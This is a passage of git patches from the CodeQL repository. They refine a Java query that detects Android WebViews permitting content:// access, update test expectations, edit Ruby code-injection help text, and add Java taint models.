a/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccessDataFlow.expected b/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccessDataFlow.expected new file mode 100644 index 00000000000..6b0c6c52625 --- /dev/null +++ b/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccessDataFlow.expected @@ -0,0 +1,5 @@ +| WebViewContentAccess.java:41:25:41:49 | (...)... | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | +| WebViewContentAccess.java:46:25:46:41 | new WebView(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | +| WebViewContentAccess.java:51:25:51:44 | getAWebView(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | +| WebViewContentAccess.java:55:29:55:48 | getAWebView(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | +| WebViewContentAccess.java:57:25:57:44 | getAWebView(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | diff --git a/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccessDataFlow.qlref b/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccessDataFlow.qlref new file mode 100644 index 00000000000..8ea25a487de --- /dev/null +++ b/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccessDataFlow.qlref @@ -0,0 +1 @@ +Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql \ No newline at end of file From 1d345c61017d24a8463c6238ffc3b9940405cb79 Mon Sep 17 00:00:00 2001 From: Edward Minnix III Date: Sat, 31 Dec 2022 14:13:22 -0500 Subject: [PATCH 089/381] Refactoring and simplification Co-authored-by: Tony Torralba --- .../CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql index 17ef02a854f..1d7fb32cfd0 100644 --- a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql +++ b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql @@ -25,7 +25,6 @@ private class TypeWebViewOrSubclass extends RefType { */ private class PrivateGetterMethodAccess extends MethodAccess { PrivateGetterMethodAccess() { - this instanceof MethodAccess and this.getMethod() instanceof GetterMethod and this.getMethod().isPrivate() } @@ -34,7 +33,7 @@ private class PrivateGetterMethodAccess extends MethodAccess { /** A source for `android.webkit.WebView` objects. */ class WebViewSource extends DataFlow::Node { WebViewSource() { - this.getType().(RefType) instanceof TypeWebViewOrSubclass and + this.getType() instanceof TypeWebViewOrSubclass and // To reduce duplicate results, we only consider WebView objects from // constructor and method calls, or method accesses which are cast to WebView. ( @@ -56,7 +55,7 @@ class WebSettingsDisallowContentAccessSink extends DataFlow::Node { exists(MethodAccess ma | ma.getQualifier() = this.asExpr() and ma.getMethod() instanceof AllowContentAccessMethod and - ma.getArgument(0).(BooleanLiteral).getBooleanValue() = false + ma.getArgument(0).(CompileTimeConstantExpr).getBooleanValue() = false ) } } @@ -64,8 +63,7 @@ class WebSettingsDisallowContentAccessSink extends DataFlow::Node { class WebViewDisallowContentAccessConfiguration extends TaintTracking::Configuration { WebViewDisallowContentAccessConfiguration() { this = "WebViewDisallowContentAccessConfiguration" } - override predicate isSource(DataFlow::Node node, DataFlow::FlowState state) { - state instanceof DataFlow::FlowStateEmpty and + override predicate isSource(DataFlow::Node node) { node instanceof WebViewSource } From 02f70f353666734b059acbacd2b0c96dd0f6487d Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Sat, 31 Dec 2022 14:56:44 -0500 Subject: [PATCH 090/381] Add @security-severity tag --- .../CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql | 1 + 1 file changed, 1 insertion(+) diff --git a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql index 1d7fb32cfd0..c7cc6eeb3c3 100644 --- a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql +++ b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql @@ -5,6 +5,7 @@ * @kind problem * @problem.severity warning * @precision medium + * @security-severity 6.5 * @tags security * external/cwe/cwe-200 */ From 68392aa8d804f546374425d036f1696ad3aa7688 Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Sat, 31 Dec 2022 15:25:25 -0500 Subject: [PATCH 091/381] Fix test expectations --- .../CWE-200/semmle/tests/WebViewContentAccess.expected | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.expected b/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.expected index f354c5658f0..dc904ca6cd7 100644 --- a/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.expected +++ b/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.expected @@ -1 +1,5 @@ -| WebViewContentAccess.java:10:9:10:44 | setAllowContentAccess(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | +| WebViewContentAccess.java:15:9:15:57 | setAllowContentAccess(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | +| WebViewContentAccess.java:38:9:38:55 | setAllowContentAccess(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | +| WebViewContentAccess.java:43:9:43:44 | setAllowContentAccess(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | +| WebViewContentAccess.java:48:9:48:44 | setAllowContentAccess(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | +| WebViewContentAccess.java:53:9:53:44 | setAllowContentAccess(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | From df1a4d2ed17f6aed6097bfdab141f24759e4a376 Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Sat, 31 Dec 2022 15:25:37 -0500 Subject: [PATCH 092/381] Documentation fix: Add `state1` and `state2` to documentation --- .../CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql | 3 +++ 1 file changed, 3 insertions(+) diff --git a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql index c7cc6eeb3c3..224d6a6cf68 100644 --- a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql +++ b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql @@ -71,6 +71,9 @@ class WebViewDisallowContentAccessConfiguration extends TaintTracking::Configura /** * Holds if the step from `node1` to `node2` is a dataflow step that gets the `WebSettings` object * from the `getSettings` method of a `WebView` object. + * + * This step is only valid when `state1` is empty and `state2` indicates that the `WebSettings` object + * has been accessed. */ override predicate isAdditionalTaintStep( DataFlow::Node node1, DataFlow::FlowState state1, DataFlow::Node node2, From 515fa21aadb6462c201a3f7c08ee357b83faf521 Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Sat, 31 Dec 2022 17:18:37 -0500 Subject: [PATCH 093/381] Change notes --- .../lib/change-notes/2022-12-21-allowcontentaccessmethod.md | 4 ++++ .../2022-12-21-android-allowcontentaccess-query.md | 4 ++++ 2 files changed, 8 insertions(+) create mode 100644 java/ql/lib/change-notes/2022-12-21-allowcontentaccessmethod.md create mode 100644 java/ql/src/change-notes/2022-12-21-android-allowcontentaccess-query.md diff --git a/java/ql/lib/change-notes/2022-12-21-allowcontentaccessmethod.md b/java/ql/lib/change-notes/2022-12-21-allowcontentaccessmethod.md new file mode 100644 index 00000000000..1f67c159788 --- /dev/null +++ b/java/ql/lib/change-notes/2022-12-21-allowcontentaccessmethod.md @@ -0,0 +1,4 @@ +--- +category: minorAnalysis +--- +* Added `AllowContentAccessMethod` to represent the `allowContentAccess` method of the `android.webkit.WebSettings` class. diff --git a/java/ql/src/change-notes/2022-12-21-android-allowcontentaccess-query.md b/java/ql/src/change-notes/2022-12-21-android-allowcontentaccess-query.md new file mode 100644 index 00000000000..008da665b57 --- /dev/null +++ b/java/ql/src/change-notes/2022-12-21-android-allowcontentaccess-query.md @@ -0,0 +1,4 @@ +--- +category: newQuery +--- +* Added a new query `java/android/websettings-content-access` to detect Android WebViews which do not disable access to `content://` urls. From 35de551f6bf6e05c67f4f2fe3c2166d3305eb987 Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Sat, 31 Dec 2022 17:19:49 -0500 Subject: [PATCH 094/381] Formatting --- .../CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql index 224d6a6cf68..509b062c595 100644 --- a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql +++ b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql @@ -64,9 +64,7 @@ class WebSettingsDisallowContentAccessSink extends DataFlow::Node { class WebViewDisallowContentAccessConfiguration extends TaintTracking::Configuration { WebViewDisallowContentAccessConfiguration() { this = "WebViewDisallowContentAccessConfiguration" } - override predicate isSource(DataFlow::Node node) { - node instanceof WebViewSource - } + override predicate isSource(DataFlow::Node node) { node instanceof WebViewSource } /** * Holds if the step from `node1` to `node2` is a dataflow step that gets the `WebSettings` object From 3815a5a096b5b2f6083c04245a4f23a5d2d2a225 Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Mon, 2 Jan 2023 10:17:08 +0100 Subject: [PATCH 095/381] fix qhelp syntax --- .../queries/security/cwe-094/UnsafeCodeConstruction.qhelp | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp b/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp index 97c7adf4c87..63f566aaa57 100644 --- a/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp +++ b/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp @@ -80,7 +80,7 @@ and methods. A safer approach is to use class_variable_set and class_variable_get along with define_method. String interpolation is still used to construct the class variable name, but this is -safe because class_variable_set is not susceptible to code injection. +safe because class_variable_set is not susceptible to code injection. To construct a dynamic method call we use send, which is ulnerable to code injection: if an attacker can control the first argument, they can call any method on the receiver. However this is less powerful than being able to run @@ -101,10 +101,10 @@ OWASP: Wikipedia: Code Injection.
  • -Ruby documentation: define_method. +Ruby documentation: define_method.
  • -Ruby documentation: class_variable_set. +Ruby documentation: class_variable_set.
    • From 3811eae67946eba9814c4945fd77e554890dc76c Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Mon, 2 Jan 2023 11:26:58 +0100 Subject: [PATCH 096/381] simplify the qhelp for unsafe-code-construction The `send()` example is not flagged by any current query, so it was weird talking about it as "vulnerable". --- .../cwe-094/UnsafeCodeConstruction.qhelp | 19 ++++++++++--------- .../examples/UnsafeCodeConstruction3Safe.rb | 1 - 2 files changed, 10 insertions(+), 10 deletions(-) diff --git a/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp b/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp index 63f566aaa57..6936aee149d 100644 --- a/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp +++ b/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp @@ -54,11 +54,11 @@ a class that has a getter method with a custom name.

    The example dynamically constructs a string which is then executed using module_eval. This code will break if the specified name is not a valid Ruby identifier, and -if the value is controlled by an attacker, then this could lead to code injection. +if the value is controlled by an attacker, then this could lead to code-injection.

    -A more robust implementation, that is also immune to code injection, +A more robust implementation, that is also immune to code-injection, can be made by using module_eval with a block and using define_method to define the getter method.

    @@ -80,13 +80,14 @@ and methods. A safer approach is to use class_variable_set and class_variable_get along with define_method. String interpolation is still used to construct the class variable name, but this is -safe because class_variable_set is not susceptible to code injection. -To construct a dynamic method call we use send, which is ulnerable -to code injection: if an attacker can control the first argument, they can call -any method on the receiver. However this is less powerful than being able to run -arbitrary Ruby code, so it is an improvement in security. We also document to -callers that they should not pass arbitrary user data to the name -parameter. +safe because class_variable_set is not susceptible to code-injection. +

    + +

    +send is used to dynamically call the method specified by name. +This is a more robust alternative than the previous example, because it does not allow +arbitrary code to be executed, but it does still allow for any method to be called +on the target object.

    diff --git a/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction3Safe.rb b/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction3Safe.rb index 65608f8aa20..ac32224ce72 100644 --- a/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction3Safe.rb +++ b/ruby/ql/src/queries/security/cwe-094/examples/UnsafeCodeConstruction3Safe.rb @@ -1,5 +1,4 @@ module Invoker - # Do not pass arbitrary user input to +name+. def attach(klass, name, target) var = :"@@#{name}" klass.class_variable_set(var, target) From fc646a6d48f996d31c6e4130bcddf3153df5c1f7 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Tue, 3 Jan 2023 16:25:04 +0000 Subject: [PATCH 097/381] Swift: Update .expected following a toString change in main. --- .../CWE-134/UncontrolledFormatString.expected | 38 +++++++++---------- 1 file changed, 19 insertions(+), 19 deletions(-) diff --git a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected index fcca34232d4..4895b075e6f 100644 --- a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected +++ b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected @@ -1,15 +1,15 @@ edges -| UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:68:28:68:28 | tainted | -| UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:71:28:71:28 | tainted | -| UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:72:28:72:28 | tainted | -| UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:74:28:74:28 | tainted | -| UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:75:28:75:28 | tainted | -| UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:76:28:76:28 | tainted | -| UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:77:46:77:46 | tainted | -| UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:86:11:86:11 | tainted | -| UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:89:61:89:61 | tainted | +| UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:68:28:68:28 | tainted | +| UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:71:28:71:28 | tainted | +| UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:72:28:72:28 | tainted | +| UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:74:28:74:28 | tainted | +| UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:75:28:75:28 | tainted | +| UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:76:28:76:28 | tainted | +| UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:77:46:77:46 | tainted | +| UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:86:11:86:11 | tainted | +| UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:89:61:89:61 | tainted | nodes -| UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | semmle.label | call to init(contentsOf:) : | +| UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | | UncontrolledFormatString.swift:68:28:68:28 | tainted | semmle.label | tainted | | UncontrolledFormatString.swift:71:28:71:28 | tainted | semmle.label | tainted | | UncontrolledFormatString.swift:72:28:72:28 | tainted | semmle.label | tainted | @@ -21,12 +21,12 @@ nodes | UncontrolledFormatString.swift:89:61:89:61 | tainted | semmle.label | tainted | subpaths #select -| UncontrolledFormatString.swift:68:28:68:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:68:28:68:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:71:28:71:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:71:28:71:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:72:28:72:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:72:28:72:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:74:28:74:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:74:28:74:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:75:28:75:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:75:28:75:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:76:28:76:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:76:28:76:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:77:46:77:46 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:77:46:77:46 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:86:11:86:11 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:86:11:86:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:89:61:89:61 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:89:61:89:61 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:68:28:68:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:68:28:68:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:71:28:71:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:71:28:71:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:72:28:72:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:72:28:72:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:74:28:74:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:74:28:74:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:75:28:75:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:75:28:75:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:76:28:76:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:76:28:76:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:77:46:77:46 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:77:46:77:46 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:86:11:86:11 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:86:11:86:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:89:61:89:61 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:89:61:89:61 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) | this user-provided value | From 21a018e5c53c25c55dad90f1da249c47a2de3ab5 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Tue, 3 Jan 2023 13:12:24 -0500 Subject: [PATCH 098/381] Java: add summary model and test for File.getName --- java/ql/lib/ext/java.io.model.yml | 2 +- java/ql/test/ext/TestModels/Test.java | 4 ++++ 2 files changed, 5 insertions(+), 1 deletion(-) diff --git a/java/ql/lib/ext/java.io.model.yml b/java/ql/lib/ext/java.io.model.yml index f4e63b01c7f..a0e7777c3b5 100644 --- a/java/ql/lib/ext/java.io.model.yml +++ b/java/ql/lib/ext/java.io.model.yml @@ -63,6 +63,7 @@ extensions: - ["java.io", "File", True, "getAbsolutePath", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["java.io", "File", True, "getCanonicalFile", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["java.io", "File", True, "getCanonicalPath", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["java.io", "File", True, "getName", "()", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["java.io", "File", True, "toPath", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["java.io", "File", True, "toString", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["java.io", "File", True, "toURI", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] @@ -91,4 +92,3 @@ extensions: extensible: neutralModel data: - ["java.io", "File", "exists", "()", "manual"] - - ["java.io", "File", "getName", "()", "manual"] # ! unsure if should be neutral model diff --git a/java/ql/test/ext/TestModels/Test.java b/java/ql/test/ext/TestModels/Test.java index bfdbe6a6a27..0b29879d907 100644 --- a/java/ql/test/ext/TestModels/Test.java +++ b/java/ql/test/ext/TestModels/Test.java @@ -1,4 +1,5 @@ import java.io.IOException; +import java.io.File; import java.math.BigDecimal; import java.sql.Connection; import java.sql.DriverManager; @@ -60,6 +61,9 @@ public class Test { Exception e1 = new IOException((String)source()); sink((String)e1.getMessage()); // $hasValueFlow + File f = (File)source(); + sink(f.getName()); // $hasTaintFlow + // java.lang Exception e2 = new Exception((String)source()); sink((String)e2.getMessage()); // $hasValueFlow From 29221ae4262664783fec5b08a5e2d11c75f3e6e2 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Tue, 3 Jan 2023 15:11:21 -0500 Subject: [PATCH 099/381] Java: add summary model for System.getProperty, adjust comments --- java/ql/lib/ext/java.lang.model.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/java/ql/lib/ext/java.lang.model.yml b/java/ql/lib/ext/java.lang.model.yml index 73ceaf88a8a..02699c278d1 100644 --- a/java/ql/lib/ext/java.lang.model.yml +++ b/java/ql/lib/ext/java.lang.model.yml @@ -103,6 +103,7 @@ extensions: - ["java.lang", "StringBuffer", True, "StringBuffer", "(String)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["java.lang", "StringBuilder", True, "StringBuilder", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["java.lang", "System", False, "arraycopy", "", "", "Argument[0]", "Argument[2]", "taint", "manual"] + - ["java.lang", "System", False, "getProperty", "(String)", "", "Argument[-1].MapValue", "ReturnValue", "value", "manual"] - ["java.lang", "Throwable", False, "Throwable", "(Throwable)", "", "Argument[0]", "Argument[-1].SyntheticField[java.lang.Throwable.cause]", "value", "manual"] - ["java.lang", "Throwable", True, "getCause", "()", "", "Argument[-1].SyntheticField[java.lang.Throwable.cause]", "ReturnValue", "value", "manual"] - ["java.lang", "Throwable", True, "getMessage", "()", "", "Argument[-1].SyntheticField[java.lang.Throwable.message]", "ReturnValue", "value", "manual"] @@ -113,7 +114,7 @@ extensions: data: - ["java.lang", "AbstractStringBuilder", "length", "()", "manual"] - ["java.lang", "Boolean", "equals", "(Object)", "manual"] - - ["java.lang", "Class", "getClassLoader", "()", "manual"] # ! unsure if should be neutral model + - ["java.lang", "Class", "getClassLoader", "()", "manual"] - ["java.lang", "Class", "getName", "()", "manual"] - ["java.lang", "Class", "getSimpleName", "()", "manual"] - ["java.lang", "Class", "isAssignableFrom", "(Class)", "manual"] @@ -127,16 +128,15 @@ extensions: - ["java.lang", "Object", "hashCode", "()", "manual"] - ["java.lang", "Object", "toString", "()", "manual"] - ["java.lang", "String", "contains", "(CharSequence)", "manual"] - - ["java.lang", "String", "endsWith", "(String)", "manual"] # ! unsure if should be neutral model since already modeled as a summary above + - ["java.lang", "String", "endsWith", "(String)", "manual"] # ! see question on line 65 above - ["java.lang", "String", "equals", "(Object)", "manual"] - ["java.lang", "String", "equalsIgnoreCase", "(String)", "manual"] - ["java.lang", "String", "hashCode", "()", "manual"] - - ["java.lang", "String", "indexOf", "(String)", "manual"] # ! unsure if should be neutral model, is flow through the param interesting in this case? + - ["java.lang", "String", "indexOf", "(String)", "manual"] - ["java.lang", "String", "isEmpty", "()", "manual"] - ["java.lang", "String", "length", "()", "manual"] - ["java.lang", "String", "startsWith", "(String)", "manual"] - ["java.lang", "System", "currentTimeMillis", "()", "manual"] - - ["java.lang", "System", "getProperty", "(String)", "manual"] # ! unsure if should be neutral model - ["java.lang", "System", "nanoTime", "()", "manual"] - ["java.lang", "Thread", "currentThread", "()", "manual"] - - ["java.lang", "Thread", "sleep", "(long)", "manual"] # ! unsure if should be neutral model, is flow through the param interesting in this case? + - ["java.lang", "Thread", "sleep", "(long)", "manual"] From 28ad9d00fb8bcb43dd860178a932a34756955d7c Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Tue, 3 Jan 2023 15:17:07 -0500 Subject: [PATCH 100/381] Merge both setAllowContentAccess queries into one query Previously, the query to detect whether or not access to `content://` links was done using two queries. Now they can be merged into one query --- .../AndroidWebViewSettingsContentAccess.ql | 21 ------------------- ...WebViewSettingsPermitsContentAccess.qhelp} | 0 ...roidWebViewSettingsPermitsContentAccess.ql | 18 +++++++++++++--- .../tests/WebViewContentAccess.expected | 5 +++++ .../semmle/tests/WebViewContentAccess.qlref | 2 +- .../WebViewContentAccessDataFlow.expected | 5 ----- .../tests/WebViewContentAccessDataFlow.qlref | 1 - 7 files changed, 21 insertions(+), 31 deletions(-) delete mode 100644 java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsContentAccess.ql rename java/ql/src/Security/CWE/CWE-200/{AndroidWebViewSettingsContentAccess.qhelp => AndroidWebViewSettingsPermitsContentAccess.qhelp} (100%) delete mode 100644 java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccessDataFlow.expected delete mode 100644 java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccessDataFlow.qlref diff --git a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsContentAccess.ql b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsContentAccess.ql deleted file mode 100644 index 1657f417754..00000000000 --- a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsContentAccess.ql +++ /dev/null @@ -1,21 +0,0 @@ -/** - * @name Android WebSettings content access - * @description Access to content providers in a WebView can enable JavaScript to access protected information. - * @kind problem - * @id java/android/websettings-content-access - * @problem.severity warning - * @security-severity 6.5 - * @precision medium - * @tags security - * external/cwe/cwe-200 - */ - -import java -import semmle.code.java.frameworks.android.WebView - -from MethodAccess ma -where - ma.getMethod() instanceof AllowContentAccessMethod and - 